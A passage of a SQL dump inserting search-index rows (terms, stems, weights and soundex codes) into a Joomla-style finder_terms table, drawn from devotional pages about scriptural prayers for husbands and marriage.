(197887, 'have success that', 'have success that', 0, 1, 1.5667, 'H123', 1, '*'),
(197888, 'he becomes', 'he becomes', 0, 1, 1.3333, 'H1252', 1, '*'),
(197889, 'he becomes as', 'he becomes as', 0, 1, 1.4333, 'H1252', 1, '*'),
(197890, 'he did', 'he did', 0, 1, 1.2, 'H300', 2, '*'),
(197891, 'he did it', 'he did it', 0, 1, 1.3, 'H300', 1, '*'),
(197892, 'he goes up', 'he goes up', 0, 1, 1.3333, 'H210', 1, '*'),
(197893, 'he has spoken', 'he has spoken', 0, 1, 1.4333, 'H2125', 1, '*'),
(197894, 'he steps', 'he steps', 0, 1, 1.2667, 'H2312', 1, '*'),
(197895, 'he steps unto', 'he steps unto', 0, 1, 1.4333, 'H231253', 1, '*'),
(197896, 'he will do', 'he will do', 0, 1, 1.3333, 'H430', 1, '*'),
(197897, 'he will eat', 'he will eat', 0, 1, 1.3667, 'H430', 1, '*'),
(197898, 'he will see', 'he will see', 0, 1, 1.3667, 'H420', 1, '*'),
(197899, 'he will surely', 'he will surely', 0, 1, 1.4667, 'H4264', 1, '*'),
(197900, 'hide', 'hide', 0, 0, 0.2667, 'H300', 1, '*'),
(197901, 'hide your', 'hide your', 0, 1, 1.3, 'H360', 1, '*'),
(197902, 'hide your plan', 'hide your plan', 0, 1, 1.4667, 'H36145', 1, '*'),
(197903, 'him a ruler', 'him a ruler', 0, 1, 1.3667, 'H5646', 1, '*'),
(197904, 'him a sure', 'him a sure', 0, 1, 1.3333, 'H526', 1, '*'),
(197905, 'him all', 'him all', 0, 1, 1.2333, 'H540', 1, '*'),
(197906, 'him all the', 'him all the', 0, 1, 1.3667, 'H543', 1, '*'),
(197907, 'him as you', 'him as you', 0, 1, 1.3333, 'H520', 1, '*'),
(197908, 'him at', 'him at', 0, 1, 1.2, 'H530', 1, '*'),
(197909, 'him at work', 'him at work', 0, 1, 1.3667, 'H5362', 1, '*'),
(197910, 'him below', 'him below', 0, 1, 1.3, 'H514', 1, '*'),
(197911, 'him below are', 'him below are', 0, 1, 1.4333, 'H5146', 1, '*'),
(197912, 'him destroyers', 'him destroyers', 0, 1, 1.4667, 'H532362', 1, '*'),
(197913, 'him destroyers seducers', 'him destroyers seducers', 0, 1, 1.7667, 'H5323623262', 1, '*'),
(197914, 'him god to', 'him god to', 0, 1, 1.3333, 'H523', 1, '*'),
(197915, 'him his', 'him his', 0, 1, 1.2333, 'H520', 2, '*'),
(197916, 'him his portion', 'him his portion', 0, 1, 1.5, 'H521635', 1, '*'),
(197917, 'him lord', 'him lord', 0, 1, 1.2667, 'H5463', 1, '*'),
(197918, 'him lord change', 'him lord change', 0, 1, 1.5, 'H5463252', 1, '*'),
(197919, 'him lord direct', 'him lord direct', 0, 1, 1.5, 'H5463623', 1, '*'),
(197920, 'him lord encounter', 'him lord encounter', 0, 1, 1.6, 'H546352536', 1, '*'),
(197921, 'him lord talk', 'him lord talk', 0, 1, 1.4333, 'H546342', 1, '*'),
(197922, 'him on', 'him on', 0, 1, 1.2, 'H500', 1, '*'),
(197923, 'him on his', 'him on his', 0, 1, 1.3333, 'H520', 1, '*'),
(197924, 'him open', 'him open', 0, 1, 1.2667, 'H515', 1, '*'),
(197925, 'him open his', 'him open his', 0, 1, 1.4, 'H5152', 1, '*'),
(197926, 'him pro', 'him pro', 0, 1, 1.2333, 'H516', 1, '*'),
(197927, 'him pro 21', 'him pro 21', 0, 1, 1.3333, 'H516', 1, '*'),
(197928, 'him stop', 'him stop', 0, 1, 1.2667, 'H5231', 1, '*'),
(197929, 'him stop comparing', 'him stop comparing', 0, 1, 1.6, 'H5231251652', 1, '*'),
(197930, 'him stop competing', 'him stop competing', 0, 1, 1.6, 'H5231251352', 1, '*'),
(197931, 'him stop getting', 'him stop getting', 0, 1, 1.5333, 'H52312352', 1, '*'),
(197932, 'him stop rating', 'him stop rating', 0, 1, 1.5, 'H52316352', 1, '*'),
(197933, 'him talk', 'him talk', 0, 1, 1.2667, 'H5342', 1, '*'),
(197934, 'him talk to', 'him talk to', 0, 1, 1.3667, 'H53423', 1, '*'),
(197935, 'him the better', 'him the better', 0, 1, 1.4667, 'H53136', 1, '*'),
(197936, 'him the more', 'him the more', 0, 1, 1.4, 'H5356', 1, '*'),
(197937, 'him to reveal', 'him to reveal', 0, 1, 1.4333, 'H53614', 1, '*'),
(197938, 'him under', 'him under', 0, 1, 1.3, 'H536', 1, '*'),
(197939, 'him under a', 'him under a', 0, 1, 1.3667, 'H536', 1, '*'),
(197940, 'him when', 'him when', 0, 1, 1.2667, 'H500', 2, '*'),
(197941, 'him when god', 'him when god', 0, 1, 1.4, 'H523', 1, '*'),
(197942, 'him with others', 'him with others', 0, 1, 1.5, 'H5362', 1, '*'),
(197943, 'him you will', 'him you will', 0, 1, 1.4, 'H540', 1, '*'),
(197944, 'him your children', 'him your children', 0, 1, 1.5667, 'H5624365', 1, '*'),
(197945, 'him-don\'t', 'him-don', 0, 0, 0.6, 'H5353', 1, '*'),
(197946, 'him-don\'t hide', 'him-don hide', 0, 1, 1.4667, 'H5353', 1, '*'),
(197947, 'him-don\'t hide your', 'him-don hide your', 0, 1, 1.6333, 'H53536', 1, '*'),
(197948, 'his battles', 'hi battles', 0, 1, 1.3667, 'H21342', 1, '*'),
(197949, 'his children\'s', 'hi children', 0, 1, 1.4667, 'H243652', 1, '*'),
(197950, 'his children\'s children', 'hi children children', 0, 1, 1.7667, 'H2436524365', 1, '*'),
(197951, 'his days', 'hi days', 0, 1, 1.2667, 'H232', 1, '*'),
(197952, 'his days he', 'hi days he', 0, 1, 1.3667, 'H232', 1, '*'),
(197953, 'his enemies', 'hi enemies', 0, 1, 1.3667, 'H252', 1, '*'),
(197954, 'his enemies out', 'hi enemies out', 0, 1, 1.5, 'H2523', 1, '*'),
(197955, 'his hands due', 'hi hands due', 0, 1, 1.4333, 'H25323', 1, '*'),
(197956, 'his portion', 'hi portion', 0, 1, 1.3667, 'H21635', 1, '*'),
(197957, 'his portion out', 'hi portion out', 0, 1, 1.5, 'H216353', 1, '*'),
(197958, 'his soul in', 'hi soul in', 0, 1, 1.3667, 'H245', 1, '*'),
(197959, 'his spirit', 'hi spirit', 0, 1, 1.3333, 'H2163', 2, '*'),
(197960, 'his spirit to', 'hi spirit to', 0, 1, 1.4333, 'H2163', 1, '*'),
(197961, 'his weakness', 'hi weakness', 0, 1, 1.4, 'H252', 1, '*'),
(197962, 'his weakness and', 'hi weakness and', 0, 1, 1.5333, 'H25253', 1, '*'),
(197963, 'home', 'home', 0, 0, 0.2667, 'H500', 3, '*'),
(197964, 'home in', 'home in', 0, 1, 1.2333, 'H500', 1, '*'),
(197965, 'home in church', 'home in church', 0, 1, 1.4667, 'H5262', 1, '*'),
(197966, 'home receive', 'home receive', 0, 1, 1.4, 'H5621', 1, '*'),
(197967, 'home receive for', 'home receive for', 0, 1, 1.5333, 'H56216', 1, '*'),
(197968, 'house god', 'hous god', 0, 1, 1.3, 'H230', 1, '*'),
(197969, 'house god to', 'hous god to', 0, 1, 1.4, 'H230', 1, '*'),
(197970, 'human being use', 'human being use', 0, 1, 1.5, 'H5152', 1, '*'),
(197971, 'husband', 'husband', 0, 0, 0.4667, 'H2153', 2, '*'),
(197972, 'husband 1', 'husband 1', 0, 1, 1.3, 'H2153', 1, '*'),
(197973, 'husband 1 gen', 'husband 1 gen', 0, 1, 1.4333, 'H215325', 1, '*'),
(197974, 'husband father', 'husband father', 0, 1, 1.4667, 'H2153136', 1, '*'),
(197975, 'husband father human', 'husband father human', 0, 1, 1.6667, 'H21531365', 1, '*'),
(197976, 'husband stop', 'husband stop', 0, 1, 1.4, 'H2153231', 1, '*'),
(197977, 'husband stop quarreling', 'husband stop quarreling', 0, 1, 1.7667, 'H215323126452', 1, '*'),
(197978, 'husband there', 'husband there', 0, 1, 1.4333, 'H21536', 1, '*'),
(197979, 'husband there will', 'husband there will', 0, 1, 1.6, 'H215364', 1, '*'),
(197980, 'if he did', 'if he did', 0, 1, 1.3, 'I130', 1, '*'),
(197981, 'in church 7', 'in church 7', 0, 1, 1.3667, 'I5262', 1, '*'),
(197982, 'in harvests', 'in harvests', 0, 1, 1.3667, 'I561232', 1, '*'),
(197983, 'in harvests of', 'in harvests of', 0, 1, 1.4667, 'I5612321', 1, '*'),
(197984, 'in his days', 'in his days', 0, 1, 1.3667, 'I5232', 1, '*'),
(197985, 'in marital', 'in marital', 0, 1, 1.3333, 'I5634', 2, '*'),
(197986, 'in marital victory', 'in marital victory', 0, 1, 1.6, 'I56341236', 1, '*'),
(197987, 'in the bundle', 'in the bundle', 0, 1, 1.4333, 'I531534', 1, '*'),
(197988, 'intercession and', 'intercess and', 0, 1, 1.5333, 'I536253', 1, '*'),
(197989, 'intercession and operate', 'intercess and operate', 0, 1, 1.8, 'I536253163', 1, '*'),
(197990, 'intercession and walk', 'intercess and walk', 0, 1, 1.7, 'I53625342', 1, '*'),
(197991, 'introduction stop', 'introduct stop', 0, 1, 1.5667, 'I5363235231', 1, '*'),
(197992, 'introduction stop complaining', 'introduct stop complaining', 0, 1, 1.9667, 'I5363235231251452', 1, '*'),
(197993, 'is no respecter', 'is no respecter', 0, 1, 1.5, 'I25621236', 1, '*'),
(197994, 'isaac jacob', 'isaac jacob', 0, 1, 1.3667, 'I210', 1, '*'),
(197995, 'isaac jacob moses', 'isaac jacob moses', 0, 1, 1.5667, 'I2152', 1, '*'),
(197996, 'isaiah 65', 'isaiah 65', 0, 1, 1.3, 'I200', 1, '*'),
(197997, 'isaiah 65 21-24', 'isaiah 65 21-24', 0, 1, 1.5, 'I200', 1, '*'),
(197998, 'isaiah 65 introduction', 'isaiah 65 introduction', 0, 1, 1.7333, 'I25363235', 1, '*'),
(197999, 'it in the', 'it in the', 0, 1, 1.3, 'I353', 2, '*'),
(198000, 'it today', 'it today', 0, 1, 1.2667, 'I300', 1, '*'),
(198001, 'it today 2', 'it today 2', 0, 1, 1.3333, 'I300', 1, '*'),
(198002, 'it will be', 'it will be', 0, 1, 1.3333, 'I341', 2, '*'),
(198003, 'item 34', 'item 34', 0, 1, 1.2333, 'I350', 1, '*'),
(198004, 'item 34 prayer', 'item 34 prayer', 0, 1, 1.4667, 'I3516', 1, '*'),
(198005, 'jacob', 'jacob', 0, 0, 0.3333, 'J100', 3, '*'),
(198006, 'jacob moses', 'jacob moses', 0, 1, 1.3667, 'J152', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(198007, 'jacob moses joshua', 'jacob moses joshua', 0, 1, 1.6, 'J152', 1, '*'),
(198008, 'josh', 'josh', 0, 0, 0.2667, 'J000', 2, '*'),
(198009, 'josh 1', 'josh 1', 0, 1, 1.2, 'J000', 1, '*'),
(198010, 'josh 1 1', 'josh 1 1', 0, 1, 1.2667, 'J000', 1, '*'),
(198011, 'joshua paul', 'joshua paul', 0, 1, 1.3667, 'J140', 1, '*'),
(198012, 'joshua paul god', 'joshua paul god', 0, 1, 1.5, 'J1423', 1, '*'),
(198013, 'k2 item 34', 'k2 item 34', 0, 1, 1.3333, 'K350', 1, '*'),
(198014, 'king he', 'king he', 0, 1, 1.2333, 'K520', 1, '*'),
(198015, 'king he will', 'king he will', 0, 1, 1.4, 'K524', 1, '*'),
(198016, 'labour isaiah', 'labour isaiah', 0, 1, 1.4333, 'L162', 1, '*'),
(198017, 'labour isaiah 65', 'labour isaiah 65', 0, 1, 1.5333, 'L162', 1, '*'),
(198018, 'labour of', 'labour of', 0, 1, 1.3, 'L161', 1, '*'),
(198019, 'labour of his', 'labour of his', 0, 1, 1.4333, 'L1612', 1, '*'),
(198020, 'leader king', 'leader king', 0, 1, 1.3667, 'L36252', 1, '*'),
(198021, 'leader king he', 'leader king he', 0, 1, 1.4667, 'L36252', 1, '*'),
(198022, 'life sling', 'life sling', 0, 1, 1.3333, 'L12452', 1, '*'),
(198023, 'life sling that', 'life sling that', 0, 1, 1.5, 'L124523', 1, '*'),
(198024, 'lord appear', 'lord appear', 0, 1, 1.3667, 'L6316', 1, '*'),
(198025, 'lord appear to', 'lord appear to', 0, 1, 1.4667, 'L63163', 1, '*'),
(198026, 'lord change', 'lord change', 0, 1, 1.3667, 'L63252', 1, '*'),
(198027, 'lord change him', 'lord change him', 0, 1, 1.5, 'L632525', 1, '*'),
(198028, 'lord direct', 'lord direct', 0, 1, 1.3667, 'L63623', 1, '*'),
(198029, 'lord direct him', 'lord direct him', 0, 1, 1.5, 'L636235', 1, '*'),
(198030, 'lord encounter', 'lord encounter', 0, 1, 1.4667, 'L6352536', 1, '*'),
(198031, 'lord encounter him', 'lord encounter him', 0, 1, 1.6, 'L63525365', 1, '*'),
(198032, 'lord set', 'lord set', 0, 1, 1.2667, 'L6323', 1, '*'),
(198033, 'lord set him', 'lord set him', 0, 1, 1.4, 'L63235', 1, '*'),
(198034, 'lord talk', 'lord talk', 0, 1, 1.3, 'L6342', 1, '*'),
(198035, 'lord talk to', 'lord talk to', 0, 1, 1.4, 'L63423', 1, '*'),
(198036, 'lord work', 'lord work', 0, 1, 1.3, 'L6362', 1, '*'),
(198037, 'lord work on', 'lord work on', 0, 1, 1.4, 'L63625', 1, '*'),
(198038, 'make him', 'make him', 0, 1, 1.2667, 'M250', 1, '*'),
(198039, 'make him a', 'make him a', 0, 1, 1.3333, 'M250', 1, '*'),
(198040, 'malice bickering', 'malic bickering', 0, 1, 1.5333, 'M4212652', 1, '*'),
(198041, 'malice bickering and', 'malic bickering and', 0, 1, 1.6667, 'M421265253', 1, '*'),
(198042, 'marital', 'marit', 0, 0, 0.4667, 'M634', 2, '*'),
(198043, 'marital comfort', 'marit comfort', 0, 1, 1.5, 'M63425163', 1, '*'),
(198044, 'marital comfort you', 'marit comfort you', 0, 1, 1.6333, 'M63425163', 1, '*'),
(198045, 'marital victory', 'marit victory', 0, 1, 1.5, 'M6341236', 1, '*'),
(198046, 'marital victory sow', 'marit victory sow', 0, 1, 1.6333, 'M63412362', 1, '*'),
(198047, 'more you prayer', 'more you prayer', 0, 1, 1.5, 'M616', 1, '*'),
(198048, 'moses joshua', 'mose joshua', 0, 1, 1.4, 'M200', 1, '*'),
(198049, 'moses joshua paul', 'mose joshua paul', 0, 1, 1.5667, 'M214', 1, '*'),
(198050, 'move away', 'move away', 0, 1, 1.3, 'M100', 1, '*'),
(198051, 'move away him', 'move away him', 0, 1, 1.4333, 'M150', 1, '*'),
(198052, 'move god', 'move god', 0, 1, 1.2667, 'M123', 1, '*'),
(198053, 'move god and', 'move god and', 0, 1, 1.4, 'M12353', 1, '*'),
(198054, 'move him', 'move him', 0, 1, 1.2667, 'M150', 1, '*'),
(198055, 'move him pro', 'move him pro', 0, 1, 1.4, 'M1516', 1, '*'),
(198056, 'mrs', 'mr', 0, 0, 0.2, 'M620', 4, '*'),
(198057, 'mrs oyenike', 'mr oyenike', 0, 1, 1.3667, 'M6252', 3, '*'),
(198058, 'mrs oyenike areogun', 'mr oyenike areogun', 0, 1, 1.6333, 'M6252625', 3, '*'),
(198059, 'multiple blessings', 'multipl blessings', 0, 1, 1.6, 'M431414252', 1, '*'),
(198060, 'multiple blessings to', 'multipl blessings to', 0, 1, 1.7, 'M4314142523', 1, '*'),
(198061, 'no respecter', 'no respecter', 0, 1, 1.4, 'N621236', 1, '*'),
(198062, 'no respecter of', 'no respecter of', 0, 1, 1.5, 'N6212361', 1, '*'),
(198063, 'noah', 'noah', 0, 0, 0.2667, 'N000', 1, '*'),
(198064, 'noah abraham', 'noah abraham', 0, 1, 1.4, 'N165', 1, '*'),
(198065, 'noah abraham isaac', 'noah abraham isaac', 0, 1, 1.6, 'N1652', 1, '*'),
(198066, 'of faith scripture', 'of faith scripture', 0, 1, 1.6, 'O1326136', 1, '*'),
(198067, 'of glory', 'of glory', 0, 1, 1.2667, 'O1246', 1, '*'),
(198068, 'of glory god', 'of glory god', 0, 1, 1.4, 'O124623', 1, '*'),
(198069, 'of his enemies', 'of his enemies', 0, 1, 1.4667, 'O1252', 1, '*'),
(198070, 'of his hands', 'of his hands', 0, 1, 1.4, 'O12532', 1, '*'),
(198071, 'of intercession and', 'of intercession and', 0, 1, 1.6333, 'O1536253', 1, '*'),
(198072, 'of life sling', 'of life sling', 0, 1, 1.4333, 'O1412452', 1, '*'),
(198073, 'of persons', 'of persons', 0, 1, 1.3333, 'O16252', 1, '*'),
(198074, 'of persons if', 'of persons if', 0, 1, 1.4333, 'O162521', 1, '*'),
(198075, 'of sweet', 'of sweet', 0, 1, 1.2667, 'O123', 1, '*'),
(198076, 'of sweet marital', 'of sweet marital', 0, 1, 1.5333, 'O1235634', 1, '*'),
(198077, 'of the agenda', 'of the agenda', 0, 1, 1.4333, 'O13253', 1, '*'),
(198078, 'of zion', 'of zion', 0, 1, 1.2333, 'O125', 1, '*'),
(198079, 'of zion he', 'of zion he', 0, 1, 1.3333, 'O125', 1, '*'),
(198080, 'olive', 'oliv', 0, 0, 0.3333, 'O410', 1, '*'),
(198081, 'olive plants', 'oliv plants', 0, 1, 1.4, 'O414532', 1, '*'),
(198082, 'olive plants growing', 'oliv plants growing', 0, 1, 1.6667, 'O414532652', 1, '*'),
(198083, 'on him at', 'on him at', 0, 1, 1.3, 'O530', 1, '*'),
(198084, 'on him to', 'on him to', 0, 1, 1.3, 'O530', 1, '*'),
(198085, 'on his weakness', 'on his weakness', 0, 1, 1.5, 'O5252', 1, '*'),
(198086, 'open his', 'open his', 0, 1, 1.2667, 'O152', 1, '*'),
(198087, 'open his spirit', 'open his spirit', 0, 1, 1.5, 'O152163', 1, '*'),
(198088, 'operate in marital', 'oper in marital', 0, 1, 1.6, 'O1635634', 1, '*'),
(198089, 'ordained for', 'ordain for', 0, 1, 1.4, 'O635316', 2, '*'),
(198090, 'ordained for him', 'ordain for him', 0, 1, 1.5333, 'O6353165', 1, '*'),
(198091, 'others that', 'other that', 0, 1, 1.3667, 'O3623', 1, '*'),
(198092, 'others that have', 'other that have', 0, 1, 1.5333, 'O36231', 1, '*'),
(198093, 'out god', 'out god', 0, 1, 1.2333, 'O323', 1, '*'),
(198094, 'out god to', 'out god to', 0, 1, 1.3333, 'O323', 1, '*'),
(198095, 'out of zion', 'out of zion', 0, 1, 1.3667, 'O3125', 1, '*'),
(198096, 'oyenike', 'oyenik', 0, 0, 0.4667, 'O520', 3, '*'),
(198097, 'oyenike areogun', 'oyenik areogun', 0, 1, 1.5, 'O52625', 3, '*'),
(198098, 'partake', 'partak', 0, 0, 0.4667, 'P632', 1, '*'),
(198099, 'partake of', 'partak of', 0, 1, 1.3333, 'P6321', 1, '*'),
(198100, 'partake of the', 'partak of the', 0, 1, 1.4667, 'P63213', 1, '*'),
(198101, 'paul god', 'paul god', 0, 1, 1.2667, 'P423', 1, '*'),
(198102, 'paul god is', 'paul god is', 0, 1, 1.3667, 'P4232', 1, '*'),
(198103, 'persons', 'person', 0, 0, 0.4667, 'P6252', 1, '*'),
(198104, 'persons if', 'person if', 0, 1, 1.3333, 'P62521', 1, '*'),
(198105, 'persons if he', 'person if he', 0, 1, 1.4333, 'P62521', 1, '*'),
(198106, 'plan from', 'plan from', 0, 1, 1.3, 'P45165', 1, '*'),
(198107, 'plan from him', 'plan from him', 0, 1, 1.4333, 'P45165', 1, '*'),
(198108, 'plants', 'plant', 0, 0, 0.4, 'P4532', 1, '*'),
(198109, 'plants growing', 'plant growing', 0, 1, 1.4667, 'P4532652', 1, '*'),
(198110, 'plants growing well', 'plant growing well', 0, 1, 1.6333, 'P45326524', 1, '*'),
(198111, 'platform', 'platform', 0, 0, 0.5333, 'P43165', 2, '*'),
(198112, 'platform of', 'platform of', 0, 1, 1.3667, 'P431651', 1, '*'),
(198113, 'platform of glory', 'platform of glory', 0, 1, 1.5667, 'P431651246', 1, '*'),
(198114, 'pls', 'pl', 0, 0, 0.2, 'P420', 1, '*'),
(198115, 'pls stop', 'pl stop', 0, 1, 1.2667, 'P4231', 1, '*'),
(198116, 'pls stop yelling', 'pl stop yelling', 0, 1, 1.5333, 'P4231452', 1, '*'),
(198117, 'portion', 'portion', 0, 0, 0.4667, 'P635', 1, '*'),
(198118, 'portion out', 'portion out', 0, 1, 1.3667, 'P6353', 1, '*'),
(198119, 'portion out of', 'portion out of', 0, 1, 1.4667, 'P63531', 1, '*'),
(198120, 'pray for your', 'prai for your', 0, 1, 1.4333, 'P616', 2, '*'),
(198121, 'pray pray', 'prai pray', 0, 1, 1.3, 'P616', 1, '*'),
(198122, 'pray pray pray', 'prai pray pray', 0, 1, 1.4667, 'P61616', 1, '*'),
(198123, 'pray pray your', 'prai pray your', 0, 1, 1.4667, 'P616', 1, '*'),
(198124, 'pray ps', 'prai ps', 0, 1, 1.2333, 'P612', 2, '*'),
(198125, 'pray ps 125', 'prai ps 125', 0, 1, 1.3667, 'P612', 1, '*'),
(198126, 'pray the', 'prai the', 0, 1, 1.2667, 'P630', 1, '*'),
(198127, 'pray the prayers', 'prai the prayers', 0, 1, 1.5333, 'P63162', 1, '*'),
(198128, 'pray your', 'prai your', 0, 1, 1.3, 'P600', 1, '*'),
(198129, 'pray your prayers', 'prai your prayers', 0, 1, 1.5667, 'P6162', 1, '*'),
(198130, 'prayed', 'prai', 0, 0, 0.4, 'P630', 1, '*'),
(198131, 'prayed for', 'prai for', 0, 1, 1.3333, 'P6316', 1, '*'),
(198132, 'prayed for david', 'prai for david', 0, 1, 1.5333, 'P6316313', 1, '*'),
(198133, 'prayer for', 'prayer for', 0, 1, 1.3333, 'P616', 2, '*'),
(198134, 'prayer for him', 'prayer for him', 0, 1, 1.4667, 'P6165', 1, '*'),
(198135, 'prayer of', 'prayer of', 0, 1, 1.3, 'P610', 1, '*'),
(198136, 'prayer of faith', 'prayer of faith', 0, 1, 1.5, 'P613', 1, '*'),
(198137, 'prayers can', 'prayer can', 0, 1, 1.3667, 'P625', 1, '*'),
(198138, 'prayers can make', 'prayer can make', 0, 1, 1.5333, 'P6252', 1, '*'),
(198139, 'prayers can move', 'prayer can move', 0, 1, 1.5333, 'P6251', 1, '*'),
(198140, 'prayers for', 'prayer for', 0, 1, 1.3667, 'P6216', 2, '*'),
(198141, 'prayers for your', 'prayer for your', 0, 1, 1.5333, 'P6216', 1, '*'),
(198142, 'prayers that', 'prayer that', 0, 1, 1.4, 'P623', 1, '*'),
(198143, 'prayers that abigail', 'prayer that abigail', 0, 1, 1.6667, 'P623124', 1, '*'),
(198144, 'prayers to', 'prayer to', 0, 1, 1.3333, 'P623', 1, '*'),
(198145, 'prayers to pray', 'prayer to pray', 0, 1, 1.5, 'P62316', 1, '*'),
(198146, 'pro 21', 'pro 21', 0, 1, 1.2, 'P600', 1, '*'),
(198147, 'pro 21 1', 'pro 21 1', 0, 1, 1.2667, 'P600', 1, '*'),
(198148, 'protection', 'protect', 0, 0, 0.6667, 'P63235', 3, '*'),
(198149, 'protection as', 'protect as', 0, 1, 1.4333, 'P632352', 1, '*'),
(198150, 'protection as he', 'protect as he', 0, 1, 1.5333, 'P632352', 1, '*'),
(198151, 'ps', 'ps', 0, 0, 0.1333, 'P200', 2, '*'),
(198152, 'ps 125', 'ps 125', 0, 1, 1.2, 'P200', 1, '*'),
(198153, 'ps 125 3', 'ps 125 3', 0, 1, 1.2667, 'P200', 1, '*'),
(198154, 'psalm 121', 'psalm 121', 0, 1, 1.3, 'P245', 1, '*'),
(198155, 'psalm 121 5-8', 'psalm 121 5-8', 0, 1, 1.4333, 'P245', 1, '*'),
(198156, 'psalm 128', 'psalm 128', 0, 1, 1.3, 'P245', 1, '*'),
(198157, 'psalm 128 1-6', 'psalm 128 1-6', 0, 1, 1.4333, 'P245', 1, '*'),
(198158, 'psalm 128 1-end', 'psalm 128 1-end', 0, 1, 1.5, 'P2453', 1, '*'),
(198159, 'psalm 68', 'psalm 68', 0, 1, 1.2667, 'P245', 1, '*'),
(198160, 'psalm 68 30', 'psalm 68 30', 0, 1, 1.3667, 'P245', 1, '*'),
(198161, 'psalm 68 6', 'psalm 68 6', 0, 1, 1.3333, 'P245', 1, '*'),
(198162, 'quarreling', 'quarrel', 0, 0, 0.6667, 'Q6452', 1, '*'),
(198163, 'quarreling with', 'quarrel with', 0, 1, 1.5, 'Q64523', 1, '*'),
(198164, 'quarreling with him', 'quarrel with him', 0, 1, 1.6333, 'Q645235', 1, '*'),
(198165, 'quote', 'quot', 0, 0, 0.3333, 'Q300', 1, '*'),
(198166, 'quote pls', 'quot pls', 0, 1, 1.3, 'Q3142', 1, '*'),
(198167, 'quote pls stop', 'quot pls stop', 0, 1, 1.4667, 'Q314231', 1, '*'),
(198168, 'rancour', 'rancour', 0, 0, 0.4667, 'R526', 1, '*'),
(198169, 'rancour stop', 'rancour stop', 0, 1, 1.4, 'R526231', 1, '*'),
(198170, 'rancour stop stop', 'rancour stop stop', 0, 1, 1.5667, 'R526231231', 1, '*'),
(198171, 'rating him', 'rate him', 0, 1, 1.3333, 'R3525', 1, '*'),
(198172, 'rating him on', 'rate him on', 0, 1, 1.4333, 'R3525', 1, '*'),
(198173, 'receive for', 'receiv for', 0, 1, 1.3667, 'R216', 1, '*'),
(198174, 'receive for him', 'receiv for him', 0, 1, 1.5, 'R2165', 1, '*'),
(198175, 'remember you', 'rememb you', 0, 1, 1.4, 'R516', 1, '*'),
(198176, 'remember you as', 'rememb you as', 0, 1, 1.5, 'R5162', 1, '*'),
(198177, 'respecter', 'respect', 0, 0, 0.6, 'R21236', 1, '*'),
(198178, 'respecter of', 'respect of', 0, 1, 1.4, 'R212361', 1, '*'),
(198179, 'respecter of persons', 'respect of persons', 0, 1, 1.6667, 'R2123616252', 1, '*'),
(198180, 'rest on', 'rest on', 0, 1, 1.2333, 'R235', 1, '*'),
(198181, 'rest on him', 'rest on him', 0, 1, 1.3667, 'R235', 1, '*'),
(198182, 'result that', 'result that', 0, 1, 1.3667, 'R243', 1, '*'),
(198183, 'result that when', 'result that when', 0, 1, 1.5333, 'R2435', 1, '*'),
(198184, 'rev mrs', 'rev mrs', 0, 1, 1.2333, 'R1562', 4, '*'),
(198185, 'rev mrs oyenike', 'rev mrs oyenike', 0, 1, 1.5, 'R156252', 3, '*'),
(198186, 'reveal', 'reveal', 0, 0, 0.4, 'R140', 1, '*'),
(198187, 'reveal yourself', 'reveal yourself', 0, 1, 1.5, 'R146241', 1, '*'),
(198188, 'reveal yourself to', 'reveal yourself to', 0, 1, 1.6, 'R1462413', 1, '*'),
(198189, 'revelations', 'revel', 0, 0, 0.7333, 'R14352', 1, '*'),
(198190, 'revelations directions', 'revel directions', 0, 1, 1.7333, 'R14352362352', 1, '*'),
(198191, 'revelations directions and', 'revel directions and', 0, 1, 1.8667, 'R1435236235253', 1, '*'),
(198192, 'rewards for', 'reward for', 0, 1, 1.3667, 'R3216', 1, '*'),
(198193, 'rewards for hard', 'reward for hard', 0, 1, 1.5333, 'R32163', 1, '*'),
(198194, 'rod', 'rod', 0, 0, 0.2, 'R300', 1, '*'),
(198195, 'rod won\'t', 'rod won', 0, 1, 1.3, 'R353', 1, '*'),
(198196, 'rod won\'t rest', 'rod won rest', 0, 1, 1.4667, 'R353623', 1, '*'),
(198197, 'ruler', 'ruler', 0, 0, 0.3333, 'R460', 1, '*'),
(198198, 'ruler leader', 'ruler leader', 0, 1, 1.4, 'R46436', 1, '*'),
(198199, 'ruler leader king', 'ruler leader king', 0, 1, 1.5667, 'R46436252', 1, '*'),
(198200, 'samuel 30', 'samuel 30', 0, 1, 1.3, 'S540', 1, '*'),
(198201, 'samuel 30 isaiah', 'samuel 30 isaiah', 0, 1, 1.5333, 'S542', 1, '*'),
(198202, 'satan\'s', 'satan', 0, 0, 0.4667, 'S352', 1, '*'),
(198203, 'satan\'s rod', 'satan rod', 0, 1, 1.3667, 'S35263', 1, '*'),
(198204, 'satan\'s rod won\'t', 'satan rod won', 0, 1, 1.5667, 'S3526353', 1, '*'),
(198205, 'scriptural prayers', 'scriptur prayers', 0, 1, 1.6, 'S61364162', 2, '*'),
(198206, 'scriptural prayers for', 'scriptur prayers for', 0, 1, 1.7333, 'S6136416216', 2, '*'),
(198207, 'scripture based', 'scriptur based', 0, 1, 1.5, 'S6136123', 1, '*'),
(198208, 'scripture based prayers', 'scriptur based prayers', 0, 1, 1.7667, 'S6136123162', 1, '*'),
(198209, 'seducers', 'seduc', 0, 0, 0.5333, 'S3262', 1, '*'),
(198210, 'seducers deceivers', 'seduc deceivers', 0, 1, 1.6, 'S326232162', 1, '*'),
(198211, 'seducers deceivers confusionists', 'seduc deceivers confusionists', 0, 1, 2, 'S3262321625125232', 1, '*'),
(198212, 'see his', 'see his', 0, 1, 1.2333, 'S000', 1, '*'),
(198213, 'see his children\'s', 'see his children', 0, 1, 1.6, 'S43652', 1, '*'),
(198214, 'seeds of', 'seed of', 0, 1, 1.2667, 'S321', 1, '*'),
(198215, 'seeds of intercession', 'seed of intercession', 0, 1, 1.7, 'S32153625', 1, '*'),
(198216, 'seen stop', 'seen stop', 0, 1, 1.3, 'S5231', 1, '*'),
(198217, 'seen stop all', 'seen stop all', 0, 1, 1.4333, 'S52314', 1, '*'),
(198218, 'set him', 'set him', 0, 1, 1.2333, 'S350', 1, '*'),
(198219, 'set him under', 'set him under', 0, 1, 1.4333, 'S3536', 1, '*'),
(198220, 'sling', 'sling', 0, 0, 0.3333, 'S452', 1, '*'),
(198221, 'sling that', 'sling that', 0, 1, 1.3333, 'S4523', 1, '*'),
(198222, 'sling that of', 'sling that of', 0, 1, 1.4333, 'S45231', 1, '*'),
(198223, 'soul in', 'soul in', 0, 1, 1.2333, 'S450', 1, '*'),
(198224, 'soul in the', 'soul in the', 0, 1, 1.3667, 'S453', 1, '*'),
